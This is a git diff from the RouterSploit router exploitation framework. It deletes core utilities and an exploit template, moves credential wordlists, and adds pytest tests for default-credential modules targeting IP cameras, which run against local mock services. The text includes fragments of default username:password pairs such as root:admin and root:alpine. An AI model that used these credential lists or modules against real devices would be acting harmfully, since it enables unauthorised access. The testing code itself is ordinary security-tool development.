-root:abc132 root:admin root:admin_1 root:alpine diff --git a/routersploit/wordlists/passwords.txt b/routersploit/resources/wordlists/passwords.txt similarity index 100% rename from routersploit/wordlists/passwords.txt rename to routersploit/resources/wordlists/passwords.txt diff --git a/routersploit/wordlists/snmp.txt b/routersploit/resources/wordlists/snmp.txt similarity index 100% rename from routersploit/wordlists/snmp.txt rename to routersploit/resources/wordlists/snmp.txt diff --git a/routersploit/wordlists/usernames.txt b/routersploit/resources/wordlists/usernames.txt similarity index 100% rename from routersploit/wordlists/usernames.txt rename to routersploit/resources/wordlists/usernames.txt diff --git a/routersploit/templates/exploit.py b/routersploit/templates/exploit.py deleted file mode 100644 index 169b19469..000000000 --- a/routersploit/templates/exploit.py +++ /dev/null @@ -1,33 +0,0 @@ -from routersploit import ( - exploits, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ Exploit template. """ - __info__ = { - 'name': '', - 'authors': [ - '', # vulnerability discovery - '', # routersploit module - ], - 'description': '', - 'references': [ - '', - ], - 'devices': [ - '', - ], - } - - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - - def run(self): - pass - - @mute - def check(self): - pass diff --git a/routersploit/threads.py b/routersploit/threads.py deleted file mode 100644 index 032f18168..000000000 --- a/routersploit/threads.py +++ /dev/null @@ -1,89 +0,0 @@ -from __future__ import absolute_import - -import threading -import time - -try: - import queue -except ImportError: - import Queue as queue - -from . import utils -from .exceptions import StopThreadPoolExecutor - - -data_queue = queue.Queue() -data_producing = threading.Event() - - -class WorkerThread(threading.Thread): - def __init__(self, name): - super(WorkerThread, self).__init__(name=name) - self.name = name - - def run(self): - while data_producing.is_set() or not data_queue.empty(): - try: - record = data_queue.get(block=False) - except queue.Empty: - continue - target = record[0] - args = record[1:] - try: - target(*args) - except StopThreadPoolExecutor: - utils.print_info() - utils.print_status("Waiting for already scheduled jobs to finish...") - data_queue.queue.clear() - finally: - data_queue.task_done() - - -class ThreadPoolExecutor(object): - def __init__(self, threads): - self.threads = threads - self.workers = [] - self.started_workers = [] - self.monitor_worker = None - self.start_time = None - - def __enter__(self): - workers = [] - data_producing.set() - for worker_id in xrange(int(self.threads)): - worker = WorkerThread( - name='worker-{}'.format(worker_id), - ) - workers.append(worker) - - self.monitor_worker = worker - self.workers = iter(workers) - self.start_time = time.time() - return self - - def __exit__(self, *args): - data_producing.clear() - try: - while self.monitor_worker.is_alive(): - self.monitor_worker.join(1) - except KeyboardInterrupt: - utils.print_info() - utils.print_status("Waiting for already scheduled jobs to finish...") - data_queue.queue.clear() - finally: - for worker in self.started_workers: - worker.join() - data_queue.unfinished_tasks = 0 - - utils.print_status('Elapsed time: ', time.time() - self.start_time, 'seconds') - - def submit(self, *args): - try: - worker = next(self.workers) - except StopIteration: - pass - else: - worker.start() - self.started_workers.append(worker) - - data_queue.put(args) diff --git a/routersploit/utils/__init__.py b/routersploit/utils/__init__.py deleted file mode 100644 index bb27a7f31..000000000 --- a/routersploit/utils/__init__.py +++ /dev/null @@ -1,640 +0,0 @@ -from __future__ import absolute_import -from __future__ import print_function - -import collections -import errno -import importlib -import os -import random -import re -import select -import socket -import string -import sys -import threading -from abc import ABCMeta, abstractmethod -from distutils.util import strtobool -from functools import wraps - -import requests - -from .. import modules as rsf_modules -from ..exceptions import RoutersploitException -from ..printer import printer_queue, thread_output_stream - -MODULES_DIR = rsf_modules.__path__[0] -CREDS_DIR = os.path.join(MODULES_DIR, 'creds') -EXPLOITS_DIR = os.path.join(MODULES_DIR, 'exploits') -SCANNERS_DIR = os.path.join(MODULES_DIR, 'scanners') - -print_lock = threading.Lock() - -colors = { - 'grey': 30, 'red': 31, - 'green': 32, 'yellow': 33, - 'blue': 34, 'magenta': 35, - 'cyan': 36, 'white': 37, -} - -# Disable certificate verification warnings -requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) - -Resource = collections.namedtuple("Resource", ["name", "template_path", "context"]) -PrintResource = collections.namedtuple("PrintResource", ['content', 'sep', 'end', 'file', 'thread']) - - -def index_modules(modules_directory=MODULES_DIR): - """ Return list of all exploits modules """ - - modules = [] - for root, dirs, files in os.walk(modules_directory): - _, package, root = root.rpartition('routersploit/modules/'.replace('/', os.sep)) - root = root.replace(os.sep, '.') - files = filter(lambda x: not x.startswith("__") and x.endswith('.py'), files) - modules.extend(map(lambda x: '.'.join((root, os.path.splitext(x)[0])), files)) - - return modules - - -def import_exploit(path): - """ Import exploit module - - :param path: absolute path to exploit e.g. routersploit.modules.exploits.asus.pass_bypass - :return: exploit module or error - """ - try: - module = importlib.import_module(path) - return getattr(module, 'Exploit') - except (ImportError, AttributeError, KeyError) as err: - raise RoutersploitException( - "Error during loading '{}'\n\n" - "Error: {}\n\n" - "It should be valid path to the module. " - "Use key multiple times for completion.".format(humanize_path(path), err) - ) - - -def iter_modules(modules_directory=MODULES_DIR): - """ Iterate over valid modules """ - - modules = index_modules(modules_directory) - modules = map(lambda x: "".join(['routersploit.modules.', x]), modules) - for path in modules: - try: - yield import_exploit(path) - except RoutersploitException: - pass - - -def pythonize_path(path): - """ Replace argument to valid python dotted notation. - - ex. foo/bar/baz -> foo.bar.baz - """ - return path.replace('/', '.') - - -def humanize_path(path): - """ Replace python dotted path to directory-like one. - - ex. foo.bar.baz -> foo/bar/baz - - :param path: path to humanize - :return: humanized path - - """ - return path.replace('.', '/') - - -def module_required(fn): - """ Checks if module is loaded. - - Decorator that checks if any module is activated - before executing command specific to modules (ex. 'run'). - """ - @wraps(fn) - def wrapper(self, *args, **kwargs): - if not self.current_module: - print_error("You have to activate any module with 'use' command.") - return - return fn(self, *args, **kwargs) - try: - name = 'module_required' - wrapper.__decorators__.append(name) - except AttributeError: - wrapper.__decorators__ = [name] - return wrapper - - -def stop_after(space_number): - """ Decorator that determine when to stop tab-completion - - Decorator that tells command specific complete function - (ex. "complete_use") when to stop tab-completion. - Decorator counts number of spaces (' ') in line in order - to determine when to stop. - - ex. "use exploits/dlink/specific_module " -> stop complete after 2 spaces - "set rhost " -> stop completing after 2 spaces - "run " -> stop after 1 space - - :param space_number: number of spaces (' ') after which tab-completion should stop - :return: - """ - def _outer_wrapper(wrapped_function): - @wraps(wrapped_function) - def _wrapper(self, *args, **kwargs): - try: - if args[1].count(' ') == space_number: - return [] - except Exception as err: - print_info(err) - return wrapped_function(self, *args, **kwargs) - return _wrapper - return _outer_wrapper - - -class DummyFile(object): - """ Mocking file object. Optimalization for the "mute" decorator. """ - def write(self, x): - pass - - -def mute(fn): - """ Suppress function from printing to sys.stdout """ - @wraps(fn) - def wrapper(self, *args, **kwargs): - thread_output_stream.setdefault(threading.current_thread(), []).append(DummyFile()) - try: - return fn(self, *args, **kwargs) - finally: - thread_output_stream[threading.current_thread()].pop() - return wrapper - - -def multi(fn): - """ Decorator for exploit.Exploit class - - Decorator that allows to feed exploit using text file containing - multiple targets definition. Decorated function will be executed - as many times as there is targets in the feed file. - - WARNING: - Important thing to remember is fact that decorator will - suppress values returned by decorated function. Since method that - perform attack is not suppose to return anything this is not a problem. - - """ - @wraps(fn) - def wrapper(self, *args, **kwargs): - if self.target.startswith('file://'): - original_target = self.target - original_port = self.port - - _, _, feed_path = self.target.partition("file://") - try: - with open(feed_path) as file_handler: - for target in file_handler: - target = target.strip() - if not target: - continue - self.target, _, port = target.partition(':') - if port: - self.port = port - else: - self.port = original_port - print_status("Attack against: {}:{}".format(self.target, - self.port)) - fn(self, *args, **kwargs) - self.target = original_target - self.port = original_port - return # Nothing to return, ran multiple times. - except IOError: - print_error("Could not read file: {}".format(self.target)) - return - - else: - return fn(self, *args, **kwargs) - return wrapper - - -def __cprint(*args, **kwargs): - """ Color print() - - Signature like Python 3 print() function - print([object, ...][, sep=' '][, end='\n'][, file=sys.stdout]) - """ - if not kwargs.pop("verbose", True): - return - - color = kwargs.get('color', None) - sep = kwargs.get('sep', ' ') - end = kwargs.get('end', '\n') - thread = threading.current_thread() - try: - file_ = thread_output_stream.get(thread, ())[-1] - except IndexError: - file_ = kwargs.get('file', sys.stdout) - - if color: - printer_queue.put(PrintResource(content='\033[{}m'.format(colors[color]), end='', file=file_, sep=sep, thread=thread)) - printer_queue.put(PrintResource(content=args, end='', file=file_, sep=sep, thread=thread)) # TODO printing text that starts from newline - printer_queue.put(PrintResource(content='\033[0m', sep=sep, end=end, file=file_, thread=thread)) - else: - printer_queue.put(PrintResource(content=args, sep=sep, end=end, file=file_, thread=thread)) - - -def print_error(*args, **kwargs): - __cprint('\033[91m[-]\033[0m', *args, **kwargs) - - -def print_status(*args, **kwargs): - __cprint('\033[94m[*]\033[0m', *args, **kwargs) - - -def print_success(*args, **kwargs): - __cprint('\033[92m[+]\033[0m', *args, **kwargs) - - -def print_info(*args, **kwargs): - __cprint(*args, **kwargs) - - -class LockedIterator(object): - def __init__(self, it): - self.lock = threading.Lock() - self.it = it.__iter__() - - def __iter__(self): - return self - - def next(self): - self.lock.acquire() - try: - return self.it.next() - finally: - self.lock.release() - - -class NonStringIterable: - - __metaclass__ = ABCMeta - - @abstractmethod - def __iter__(self): - while False: - yield None - - @classmethod - def __subclasshook__(cls, C): - if cls is NonStringIterable: - if any("__iter__" in B.__dict__ for B in C.__mro__): - return True - return NotImplemented - - -def print_table(headers, *args, **kwargs): - """ Print table. - - example: - - Name Current setting Description - ---- --------------- ----------- - option_name value description - foo bar baz - foo bar baz - - :param headers: Headers names ex.('Name, 'Current setting', 'Description') - :param args: table values, each element representing one line ex. ('option_name', 'value', 'description), ... - :param kwargs: 'extra_fill' space between columns, 'header_separator' character to separate headers from content - :return: - """ - extra_fill = kwargs.get("extra_fill", 5) - header_separator = kwargs.get("header_separator", '-') - max_column_length = kwargs.get("max_column_length", 60) - - if not all(map(lambda x: len(x) == len(headers), args)): - print_error("Headers and table rows tuples should be the same length.") - return - - def custom_len(x): - try: - return len(x) - except TypeError: - return 0 - - fill = [] - headers_line = ' ' - headers_separator_line = ' ' - for idx, header in enumerate(headers): - column = [custom_len(arg[idx]) for arg in args] - column.append(len(header)) - - if max(column) > max_column_length: - current_line_fill = max_column_length + extra_fill - else: - current_line_fill = max(column) + extra_fill - fill.append(current_line_fill) - headers_line = "".join((headers_line, "{header:<{fill}}".format(header=header, fill=current_line_fill))) - headers_separator_line = "".join(( - headers_separator_line, - '{:<{}}'.format(header_separator * len(header), current_line_fill) - )) - - print_info() - print_info(headers_line) - print_info(headers_separator_line) - - for arg in args: - content_line_data = {} - for idx, element in enumerate(arg): - content_line_data[idx] = str(element) - - while not all(map(lambda x: len(content_line_data[x]) == 0, content_line_data.keys())): - content_line = ' ' - for idx in content_line_data.keys(): - element = content_line_data[idx][:max_column_length] - content_line = "".join(( - content_line, - '{:<{}}'.format(element, fill[idx]) - )) - content_line_data[idx] = content_line_data[idx][max_column_length:] - print_info(content_line) - print_info() - - -def sanitize_url(address): - """Sanitize url. - - Converts address to valid HTTP url. - """ - if address.startswith("http://") or address.startswith("https://"): - return address - else: - return "http://{}".format(address) - - -def pprint_dict_in_order(dictionary, order=None): - """ Pretty dict print. - - Pretty printing dictionary in specific order. (as in 'show info' command) - Keys not mentioned in *order* parameter will be printed in random order. - - ex. pprint_dict_in_order({'name': John, 'sex': 'male', "hobby": ["rugby", "golf"]}, ('sex', 'name')) - - Sex: - male - - Name: - John - - Hobby: - - rugby - - golf - - """ - order = order or () - - def prettyprint(title, body): - print_info("\n{}:".format(title.capitalize())) - if not isinstance(body, str): - for value_element in body: - print_info('- ', value_element) - else: - print_info(body) - - keys = dictionary.keys() - for element in order: - try: - key = keys.pop(keys.index(element)) - value = dictionary[key] - except (KeyError, ValueError): - pass - else: - prettyprint(element, value) - - for rest_keys in keys: - prettyprint(rest_keys, dictionary[rest_keys]) - - -def random_text(length, alph=string.ascii_letters + string.digits): - """ Random text generator. NOT crypto safe. - - Generates random text with specified length and alphabet. - """ - return ''.join(random.choice(alph) for _ in range(length)) - - -def http_request(method, url, session=requests, **kwargs): - """ Wrapper for 'requests' silencing exceptions a little bit. """ - - kwargs.setdefault('timeout', 30.0) - kwargs.setdefault('verify', False) - - try: - return getattr(session, method.lower())(url, **kwargs) - except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): - print_error("Invalid URL format: {}".format(url)) - return - except requests.exceptions.ConnectionError: - print_error("Connection error: {}".format(url)) - return - except requests.RequestException as error: - print_error(error) - return - except socket.error as err: - print_error(err) - return - except KeyboardInterrupt: - print_info() - print_status("Module has been stopped") - - -def boolify(value): - """ Function that will translate common strings into bool values - - True -> "True", "t", "yes", "y", "on", "1" - False -> any other string - - Objects other than string will be transformed using built-in bool() function. - """ - if isinstance(value, basestring): - try: - return bool(strtobool(value)) - except ValueError: - return False - else: - return bool(value) - - -def ssh_interactive(ssh): - chan = ssh.invoke_shell() - if os.name == 'posix': - posix_shell(chan) - else: - windows_shell(chan) - - -def posix_shell(chan): - import termios - import tty - - oldtty = termios.tcgetattr(sys.stdin) - try: - tty.setraw(sys.stdin.fileno()) - tty.setcbreak(sys.stdin.fileno()) - chan.settimeout(0.0) - - while True: - r, w, e = select.select([chan, sys.stdin], [], []) - if chan in r: - try: - x = unicode(chan.recv(1024)) - if len(x) == 0: - break - sys.stdout.write(x) - sys.stdout.flush() - except socket.timeout: - pass - - if sys.stdin in r: - x = sys.stdin.read(1) - if len(x) == 0: - break - chan.send(x) - finally: - termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty) - return - - -def windows_shell(chan): - def writeall(sock): - while True: - data = sock.recv(256) - if not data: - sys.stdout.flush() - return - - sys.stdout.write(data) - sys.stdout.flush() - - writer = threading.Thread(target=writeall, args=(chan,)) - writer.start() - - try: - while True: - d = sys.stdin.read(1) - if not d: - break - - chan.send(d) - except: - pass - - -def tokenize(token_specification, text): - Token = collections.namedtuple('Token', ['typ', 'value', 'line', 'column', 'mo']) - - token_specification.extend(( - ('NEWLINE', r'\n'), # Line endings - ('SKIP', r'.'), # Any other character - )) - - tok_regex = '|'.join('(?P<%s>%s)' % pair for pair in token_specification) - line_num = 1 - line_start = 0 - for mo in re.finditer(tok_regex, text): - kind = mo.lastgroup - value = filter(lambda x: x is not None, mo.groups()) - if kind == 'NEWLINE': - line_start = mo.end() - line_num += 1 - elif kind == 'SKIP': - pass - else: - column = mo.start() - line_start - yield Token(kind, value, line_num, column, mo) - - -def create_exploit(path): # TODO: cover with tests - from ..templates import exploit - - parts = path.split(os.sep) - module_type, name = parts[0], parts[-1] - if len(parts) < 3: - print_error("Invalid format. " - "Use following naming convention: module_type/vendor_name/exploit_name\n" - "e.g. exploits/dlink/password_disclosure".format(name)) - return - - if not name: - print_error("Invalid exploit name: '{}'\n" - "Use following naming convention: module_type/vendor_name/exploit_name\n" - "e.g. exploits/dlink/password_disclosure".format(name)) - return - - types = ['creds', 'exploits', 'scanners'] - if module_type not in types: - print_error("Invalid module type: '{}'\n" - "Available types: {}\n" - "Use following naming convention: module_type/vendor_name/exploit_name\n" - "e.g. exploits/dlink/password_disclosure".format(module_type, types)) - return - - create_resource( - name=os.path.join(*parts[:-1]), - content=( - Resource( - name="{}.py".format(name), - template_path=os.path.abspath(exploit.__file__.rstrip("c")), - context={}), - ), - python_package=True - ) - - -def create_resource(name, content=(), python_package=False): # TODO: cover with tests - """ Creates resource directory in current working directory. """ - root_path = os.path.join(MODULES_DIR, name) - mkdir_p(root_path) - - if python_package: - open(os.path.join(root_path, "__init__.py"), "a").close() - - for name, template_path, context in content: - if os.path.splitext(name)[-1] == "": # Checking if resource has extension if not it's directory - mkdir_p(os.path.join(root_path, name)) - else: - try: - with open(template_path, "rb") as template_file: - template = string.Template(template_file.read()) - except (IOError, TypeError): - template = string.Template("") - - try: - file_handle = os.open(os.path.join(root_path, name), os.O_CREAT | os.O_EXCL | os.O_WRONLY) - except OSError as e: - if e.errno == errno.EEXIST: - print_status("{} already exist.".format(name)) - else: - raise - else: - with os.fdopen(file_handle, 'w') as target_file: - target_file.write(template.substitute(**context)) - print_success("{} successfully created.".format(name)) - - -def mkdir_p(path): # TODO: cover with tests - """ - Simulate mkdir -p shell command. Creates directory with all needed parents. - :param path: Directory path that may include non existing parent directories - :return: - """ - try: - os.makedirs(path) - print_success("Directory {path} successfully created.".format(path=path)) - except OSError as exc: - if exc.errno == errno.EEXIST and os.path.isdir(path): - print_success("Directory {path}".format(path=path)) - else: - raise diff --git a/routersploit/utils/lzs.py b/routersploit/utils/lzs.py deleted file mode 100644 index a8ff2cc8a..000000000 --- a/routersploit/utils/lzs.py +++ /dev/null @@ -1,140 +0,0 @@ -# !/usr/bin/env python -# -*- coding:utf-8 -*- - -############################################################## -# Lempel-Ziv-Stac decompression -# BitReader and RingList classes -# -# Copyright (C) 2011 Filippo Valsorda - FiloSottile -# filosottile.wiki gmail.com - www.pytux.it -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see <http://www.gnu.org/licenses/>. -# -############################################################## - -import collections - - -class BitReader: - """ - Gets a string or a iterable of chars (also mmap) - representing bytes (ord) and permits to extract - bits one by one like a stream - """ - - def __init__(self, bytes): - self._bits = collections.deque() - - for byte in bytes: - byte = ord(byte) - for n in xrange(8): - self._bits.append(bool((byte >> (7 - n)) & 1)) - - def getBit(self): - return self._bits.popleft() - - def getBits(self, num): - res = 0 - for i in xrange(num): - res += self.getBit() << num - 1 - i - return res - - def getByte(self): - return self.getBits(8) - - def __len__(self): - return len(self._bits) - - -class RingList: - """ - When the list is full, for every item appended - the older is removed - """ - - def __init__(self, length): - self.__data__ = collections.deque() - self.__full__ = False - self.__max__ = length - - def append(self, x): - if self.__full__: - self.__data__.popleft() - self.__data__.append(x) - if self.size() == self.__max__: - self.__full__ = True - - def get(self): - return self.__data__ - - def size(self): - return len(self.__data__) - - def maxsize(self): - return self.__max__ - - def __getitem__(self, n): - if n >= self.size(): - return None - return self.__data__[n] - - -def LZSDecompress(data, window=RingList(2048)): - """ - Gets a string or a iterable of chars (also mmap) - representing bytes (ord) and an optional - pre-populated dictionary; return the decompressed - string and the final dictionary - """ - reader = BitReader(data) - result = '' - - while True: - bit = reader.getBit() - if not bit: - char = reader.getByte() - result += chr(char) - window.append(char) - else: - bit = reader.getBit() - if bit: - offset = reader.getBits(7) - if offset == 0: - # EOF - break - else: - offset = reader.getBits(11) - - lenField = reader.getBits(2) - if lenField < 3: - lenght = lenField + 2 - else: - lenField <<= 2 - lenField += reader.getBits(2) - if lenField < 15: - lenght = (lenField & 0x0f) + 5 - else: - lenCounter = 0 - lenField = reader.getBits(4) - while lenField == 15: - lenField = reader.getBits(4) - lenCounter += 1 - lenght = 15 * lenCounter + 8 + lenField - - for i in xrange(lenght): - char = window[-offset] - result += chr(char) - window.append(char) - - return result, window diff --git a/routersploit/validators.py b/routersploit/validators.py deleted file mode 100644 index 2bc281148..000000000 --- a/routersploit/validators.py +++ /dev/null @@ -1,109 +0,0 @@ -import socket -import urlparse -from distutils.util import strtobool - -from .exceptions import OptionValidationError - - -def url(address): - """Sanitize url. - - Converts address to valid HTTP url. - """ - if address.startswith("http://") or address.startswith("https://"): - return address - else: - return "http://{}".format(address) - - -def address(addr): - addr = urlparse.urlsplit(addr) - return addr.netloc or addr.path - - -def choice(valid_values): - valid_values = [] if not valid_values else valid_values - - def _enum(value): - if value not in valid_values: - raise OptionValidationError( - "Selected '{}' value isn't correct. " - "Possible values are: {}".format(value, valid_values) - ) - - return value - - return _enum - - -def ipv4(address): - address = address.replace("http://", "").replace("https://", "") - - try: - socket.inet_pton(socket.AF_INET, address) - except AttributeError: - try: - socket.inet_aton(address) - except socket.error: - raise OptionValidationError("Option have to be valid IP address.") - - if address.count('.') == 3: - return address - else: - raise OptionValidationError("Option have to be valid IP address.") - except socket.error: - raise OptionValidationError("Option have to be valid IP address.") - - return address - - -def boolify(value): - """ Function that will translate common strings into bool values - - True -> "True", "t", "yes", "y", "on", "1" - False -> any other string - - Objects other than string will be transformed - using built-in bool() function. - """ - if isinstance(value, basestring): - try: - return bool(strtobool(value)) - except ValueError: - return False - else: - return bool(value) - - -def integer(number): - """ Cast Option value to the integer using int() """ - try: - return int(number) - except ValueError: - raise OptionValidationError( - "Invalid option. can't cast '{}' to integer.".format(number) - ) - - -def convert_ip(address): - """ Convert IP to bytes""" - try: - res = "" - for i in address.split("."): - res += chr(int(i)) - return res - except Exception: - raise OptionValidationError( - "Invalid option. '{}' is not a valid IP address".format(address) - ) - - -def convert_port(port): - """ Convert Port to bytes""" - try: - res = "%.4x" % int(port) - return res.decode('hex') - except Exception: - raise OptionValidationError( - "Invalid option. '{}' is not a valid port number".format(port) - ) diff --git a/rsf.py b/rsf.py index 01d19c488..09f23b632 100755 --- a/rsf.py +++ b/rsf.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python2 +#!/usr/bin/env python from __future__ import print_function @@ -6,7 +6,6 @@ import logging.handlers from routersploit.interpreter import RoutersploitInterpreter -from routersploit.utils import create_exploit log_handler = logging.handlers.RotatingFileHandler(filename='routersploit.log', maxBytes=500000) log_formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s %(message)s') @@ -26,11 +25,5 @@ def routersploit(): rsf = RoutersploitInterpreter() rsf.start() - if __name__ == "__main__": - args = parser.parse_args() - - if args.add_exploit: - create_exploit(args.add_exploit) - else: - routersploit() + routersploit() diff --git a/tests/conftest.py b/tests/conftest.py new file mode 100644 index 000000000..700aa33ed --- /dev/null +++ b/tests/conftest.py @@ -0,0 +1,22 @@ +import pytest +from unittest.mock import patch + +from threat9_test_bed.scenarios import HttpScenario +from threat9_test_bed.service_mocks import HttpScenarioService, HttpServiceMock +from threat9_test_bed.scenarios import TelnetScenario +from threat9_test_bed.service_mocks.telnet_service_mock import TelnetServiceMock + +import routersploit.core.exploit.shell + + +@pytest.fixture +def target(): + with HttpServiceMock("127.0.0.1", 0) as target_: + yield target_ + + +@pytest.fixture +def generic_target(): + with TelnetServiceMock("127.0.0.1", 0, TelnetScenario.AUTHORIZED) as telnet_service: + yield telnet_service + diff --git a/tests/creds/__init__.py b/tests/creds/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/__init__.py b/tests/creds/cameras/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/acti/__init__.py b/tests/creds/cameras/acti/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/acti/test_telnet_default_creds.py b/tests/creds/cameras/acti/test_telnet_default_creds.py new file mode 100644 index 000000000..a3501e5e3 --- /dev/null +++ b/tests/creds/cameras/acti/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.acti.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/acti/test_webinterface_default_creds.py b/tests/creds/cameras/acti/test_webinterface_default_creds.py new file mode 100644 index 000000000..06920376e --- /dev/null +++ b/tests/creds/cameras/acti/test_webinterface_default_creds.py @@ -0,0 +1,20 @@ +from flask import request +from routersploit.modules.creds.cameras.acti.webinterface_http_form_default_creds import Exploit + + +def apply_response(*args, **kwargs): + if request.method == "GET": + return "Password", 200 + elif request.method == "POST": + return "TEST", 200 + + +def test_check_success(target): + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/video.htm", methods=["GET", "POST"]) + cgi_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port diff --git a/tests/creds/cameras/american_dynamics/__init__.py b/tests/creds/cameras/american_dynamics/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/american_dynamics/test_telnet_default_creds.py b/tests/creds/cameras/american_dynamics/test_telnet_default_creds.py new file mode 100644 index 000000000..57682808b --- /dev/null +++ b/tests/creds/cameras/american_dynamics/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.american_dynamics.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/arecont/__init__.py b/tests/creds/cameras/arecont/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/arecont/test_telnet_default_creds.py b/tests/creds/cameras/arecont/test_telnet_default_creds.py new file mode 100644 index 000000000..b9e450f0b --- /dev/null +++ b/tests/creds/cameras/arecont/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.arecont.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/avigilon/__init__.py b/tests/creds/cameras/avigilon/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/avigilon/test_telnet_default_creds.py b/tests/creds/cameras/avigilon/test_telnet_default_creds.py new file mode 100644 index 000000000..6e2bfa785 --- /dev/null +++ b/tests/creds/cameras/avigilon/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.avigilon.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/avtech/__init__.py b/tests/creds/cameras/avtech/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/avtech/test_telnet_default_creds.py b/tests/creds/cameras/avtech/test_telnet_default_creds.py new file mode 100644 index 000000000..2b4fed7ec --- /dev/null +++ b/tests/creds/cameras/avtech/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.avtech.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/axis/__init__.py b/tests/creds/cameras/axis/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/axis/test_telnet_default_creds.py b/tests/creds/cameras/axis/test_telnet_default_creds.py new file mode 100644 index 000000000..ed919cb5a --- /dev/null +++ b/tests/creds/cameras/axis/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.axis.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/axis/test_webinterface_http_auth_default_creds.py b/tests/creds/cameras/axis/test_webinterface_http_auth_default_creds.py new file mode 100644 index 000000000..c0f74c2f2 --- /dev/null +++ b/tests/creds/cameras/axis/test_webinterface_http_auth_default_creds.py @@ -0,0 +1,30 @@ +from flask import request, Response +from base64 import b64decode +from routersploit.modules.creds.cameras.axis.webinterface_http_auth_default_creds import Exploit + + +def apply_response(*args, **kwargs): + if "Authorization" in request.headers.keys(): + creds = str(b64decode(request.headers["Authorization"].replace("Basic ", "")), "utf-8") + + if creds in ["root:pass", "root:admin"]: + return "Authorized", 200 + + resp = Response("Unauthorized") + resp.headers["WWW-Authenticate"] = "Basic ABC" + return resp, 401 + + +def test_check_success(target): + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/", methods=["GET", "POST"]) + cgi_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() is True + assert exploit.check_default() is not None + assert exploit.run() is None diff --git a/tests/creds/cameras/basler/__init__.py b/tests/creds/cameras/basler/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/basler/test_telnet_default_creds.py b/tests/creds/cameras/basler/test_telnet_default_creds.py new file mode 100644 index 000000000..06afdfe09 --- /dev/null +++ b/tests/creds/cameras/basler/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.basler.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/basler/test_webinterface_default_creds.py b/tests/creds/cameras/basler/test_webinterface_default_creds.py new file mode 100644 index 000000000..6e801f588 --- /dev/null +++ b/tests/creds/cameras/basler/test_webinterface_default_creds.py @@ -0,0 +1,20 @@ +from flask import request +from routersploit.modules.creds.cameras.basler.webinterface_http_form_default_creds import Exploit + + +def apply_response(*args, **kwargs): + if request.method == "GET": + return "Password", 200 + elif request.method == "POST": + return "TEST", 200 + + +def test_check_success(target): + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/video.htm", methods=["GET", "POST"]) + cgi_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port diff --git a/tests/creds/cameras/brickcom/__init__.py b/tests/creds/cameras/brickcom/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/brickcom/test_telnet_default_creds.py b/tests/creds/cameras/brickcom/test_telnet_default_creds.py new file mode 100644 index 000000000..ad71aa5aa --- /dev/null +++ b/tests/creds/cameras/brickcom/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from 